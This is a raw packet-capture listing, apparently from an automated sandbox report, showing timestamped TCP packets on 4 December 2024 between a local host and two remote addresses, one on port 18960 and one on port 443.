                                                                                                                                                                                                        Dec 4, 2024 13:53:16.413642883 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.413744926 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.413963079 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.414011955 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.414212942 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.414261103 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.414849997 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415023088 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415086985 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415291071 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415704966 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415867090 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415934086 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.415983915 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.416281939 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.416529894 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.416615963 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.416647911 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.417380095 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.417553902 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.417582035 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.418229103 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.418308973 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.418324947 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.419152021 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.419195890 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.419243097 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.419914961 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.420015097 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.420043945 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.420763016 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.420840979 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.420914888 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.421706915 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.421766996 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.421791077 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.422477007 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.422580957 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.422640085 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.423363924 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.423424959 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.423530102 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.424390078 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.424439907 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.424448967 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.425159931 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.425306082 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.425343037 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.426069975 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.426107883 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.426148891 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.426739931 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.426804066 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.426846027 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.427551031 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.427611113 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.427678108 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.428456068 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.428566933 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.428611040 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.429223061 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.429266930 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.429341078 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.430212975 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.430341959 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.430392027 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.431293011 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.431330919 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.432101011 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.432118893 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.439107895 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.439115047 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.442780018 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.442804098 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.446477890 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.446486950 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.446542978 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.446554899 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.460053921 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.460064888 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.462939024 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.464014053 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.464025974 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.470457077 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.470460892 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.476556063 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.476562977 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.483026981 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.483031988 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.511281013 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.511445045 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.511534929 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.511558056 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.511778116 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.512531042 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.512583017 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.512605906 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.512662888 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.513219118 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.513281107 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.513608932 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.514200926 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.514367104 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.515311003 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.515358925 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.515377998 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.515415907 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.515978098 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.516128063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.516925097 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.516978025 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.517110109 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.517162085 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.517640114 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.517658949 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.518305063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.518356085 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.518450022 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.518503904 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.519263029 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.519402981 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.519548893 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.519915104 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.520050049 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.520761967 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.520826101 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.520828962 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.520874023 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.521536112 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.521730900 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.522341967 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.522386074 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.522499084 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.522538900 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.523155928 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.523251057 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.523298025 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.523998976 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.524091959 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.524775028 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.524827003 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.524888039 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.524930954 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.525655985 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.525777102 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.525821924 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.526480913 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.526576996 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.527254105 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.527296066 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.527395964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.527435064 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.528095961 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.528182030 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.528924942 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.528965950 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.529031992 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.529078960 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.529700994 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.572309971 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.598651886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.598752022 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.598877907 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.598994017 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.599162102 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.599446058 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.599487066 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.600086927 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.600158930 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.600179911 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.600955963 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.601042986 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.601110935 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.601766109 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.601861954 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.601865053 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.602472067 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.602538109 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.602607012 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.603338003 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.603406906 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.603429079 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.604185104 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.604286909 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.604341984 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.605066061 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.605155945 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.605189085 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.605926037 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.606046915 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.606101036 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.606733084 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.606775045 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.606826067 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.607537985 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.607590914 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.607670069 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.608351946 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.608427048 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.608434916 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.609133005 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.609191895 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.609266043 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.610021114 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.610105991 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.610109091 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.610800982 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.610909939 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.610979080 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.611640930 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.611700058 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.611752033 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.612473965 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.612529039 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.612601042 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.613462925 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.613517046 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.613637924 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.614279985 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.614317894 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.614379883 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.615206957 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.615365028 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.615433931 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.615961075 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.616008997 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.616173029 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.617094994 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.617187023 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.617234945 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.617945910 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.618010044 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.618076086 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.619158030 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.619175911 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.619230032 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.619563103 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.619635105 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.619667053 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.620249033 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.620309114 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.620316982 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.620992899 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.621082067 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.621093988 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.621731043 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.621798038 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.621886969 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.622430086 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.622536898 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.622539997 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.703361988 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.703454971 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.703525066 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.703675032 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.703725100 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.703762054 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.704515934 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.704611063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.704668999 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.705308914 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.705367088 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.705420017 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.706146002 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.706238985 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.706285954 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.706968069 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.707020998 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.707071066 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.707815886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.708034039 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.708110094 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.708724022 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.708785057 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.708817005 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.709466934 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.709569931 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.709619999 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.710303068 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.710345984 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.710376024 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.711141109 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.711266994 CET189604970195.169.201.100192.168.2.7
